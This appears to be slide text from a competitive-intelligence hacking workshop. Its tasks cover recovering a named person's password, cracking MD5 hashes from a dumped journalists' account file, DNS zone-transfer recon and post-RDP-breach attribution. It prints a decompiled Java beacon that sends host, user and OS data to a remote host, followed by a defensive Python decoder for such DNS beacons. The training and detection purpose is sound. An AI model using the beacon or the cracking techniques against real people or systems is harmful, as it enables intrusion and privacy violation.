nazar-tymoshyk
Competitive Intelligence –
Competitor's Fatality
Igor Beliaiev
What is Competitive Intelligence (CI)?
Basic methods
Private data
Start is here: goo.gl/ygm51k
Info about the hack
The Workshop
Task #1. Intro
We know that Mikko Kuttonen is using GitHub.
His GitHub account for work stuff is mikkoKut1
You have to find his password for the home media server (107.170.*.*).
Task #2. Pakistani
There is a hacker from Pakistan. He is paid to hunt various journalists who show how things are going in Ukraine during the revolution.
We have some information about his last attacks, so we have to find out what he has done with his victims.
We have a dump of journalists' accounts on times.com (times.zip).
Let's find any password that he could have cracked. We know that only one of those accounts got hacked, so we have to find the easiest password.
Hint! Journalists' passwords are hashed with the MD5 algorithm
Hint! You can use online MD5 decoders
Task #3. Archive
As you can see, we also have another archive with file zik.doc, which we need, but it's encrypted.
We need to read the data from zikua.doc
Hint! Look carefully at the files in the archives. Do they have anything in common?
Hint! You might also use some of the tools you got with the tasks. But remember, you don't have much time.
Task #4. Zik.ua
From the previous task we have learned that there are some important files on a torrent server at a*****.zik.ua
We need to find the subdomain and torrent server.
Hint! DNS requests might help you
Hint! You can try to use AXFR requests
$1mln/month
ValveSoftware.com
Task #5. Find the hacker
Finally we managed to find the real IP address of the Pakistani hacker, and even brute-force his RDP password.
We started to download his private files, but suddenly the connection was lost... forever.
We managed to download only one file.
Using this file, find the name of the hacker!
Tasks from PHDays
// Collect OS name, user name, local IP address and host name
String str1 = System.getProperty("os.name");
String str2 = System.getProperty("user.name");
InetAddress localInetAddress2 = InetAddress.getLocalHost();
InetAddress[] arrayOfInetAddress = InetAddress.getAllByName(localInetAddress2.getCanonicalHostName());
String str3 = arrayOfInetAddress[0].toString();
InetAddress localInetAddress1 = InetAddress.getLocalHost();
String str4 = localInetAddress1.getHostName();
// Hex-encode "host|user|os" and cut it to 63 characters
String str5 = toHexString(str4.getBytes()) + toHexString("|".getBytes()) + toHexString(str2.getBytes()) + toHexString("|".getBytes()) + toHexString(str1.getBytes());
if (str5.length() > 63) {
    str5 = str5.substring(0, 63);
}
// The encoded string is used as the first part of the host name to connect to
Socket localSocket = new Socket(str5 + paramString2, 80);
String str6 = readAll(localSocket);
String str7 = "access=true";
if (str6.contains(str7)) {
    localSocket = new Socket(paramString1 + "/loadsmb.cgi?host=" + str3 + "&file=/", 80);
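A defender's view of the snippet above, as an added example that is not part of the original slides: the code packs hex-encoded hostname|user|OS into the first label of a host name (at most 63 characters), so resolving that name already leaks the data. This Python example decodes such labels from a DNS query log; the log format, the domain names, the 16-character threshold and the plain-hex output of toHexString() are assumptions.

```python
import re

# Assumption: toHexString() in the snippet emits plain hex digits, no separators.
HEX_LABEL = re.compile(r"[0-9a-fA-F]{16,63}")  # 16 is an arbitrary lower bound
DNS_LABEL_MAX = 63  # the snippet cuts its hex string to one DNS label


def decode_beacon_label(qname):
    """Decode host|user|os from the first label of qname, or return None."""
    label = qname.split(".", 1)[0]
    if not HEX_LABEL.fullmatch(label):
        return None
    truncated = len(label) == DNS_LABEL_MAX
    if len(label) % 2:  # a cut at 63 characters leaves half a byte at the end
        label = label[:-1]
    raw = bytes.fromhex(label)
    if b"|" not in raw:  # hex-looking label without the separator: not this beacon
        return None
    parts = raw.decode("utf-8", errors="replace").split("|", 2)
    parts += [""] * (3 - len(parts))
    return {"host": parts[0], "user": parts[1], "os": parts[2], "truncated": truncated}


def scan_queries(lines):
    """Return (client, qname, fields) for every log line that decodes."""
    hits = []
    for line in lines:
        cols = line.split()
        fields = decode_beacon_label(cols[2]) if len(cols) >= 3 else None
        if fields:
            hits.append((cols[1], cols[2], fields))
    return hits


def _label(host, user, os_name):
    """Build a constructed sample label the way the snippet does."""
    return "|".join((host, user, os_name)).encode().hex()[:DNS_LABEL_MAX]


# Constructed sample log: "<time> <client> <qname>"; names and domain are made up.
SAMPLE_LOG = [
    "10:01:02 10.0.0.15 www.example.org",
    "10:01:03 10.0.0.15 " + _label("WS-042", "anna", "Windows 7") + ".c2.example",
    "10:01:09 10.0.0.23 " + _label("FINANCE-LAPTOP-07", "igor.b", "Windows 8.1") + ".c2.example",
    "10:01:10 10.0.0.23 deadbeefdeadbeefdeadbeef.cdn.example",
]

for client, qname, fields in scan_queries(SAMPLE_LOG):
    print(client, fields)
```

The second hit shows the effect of the 63-character cut: the OS field comes back incomplete and the `truncated` flag is set.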
+ WebRTC (net.ipcalf.com)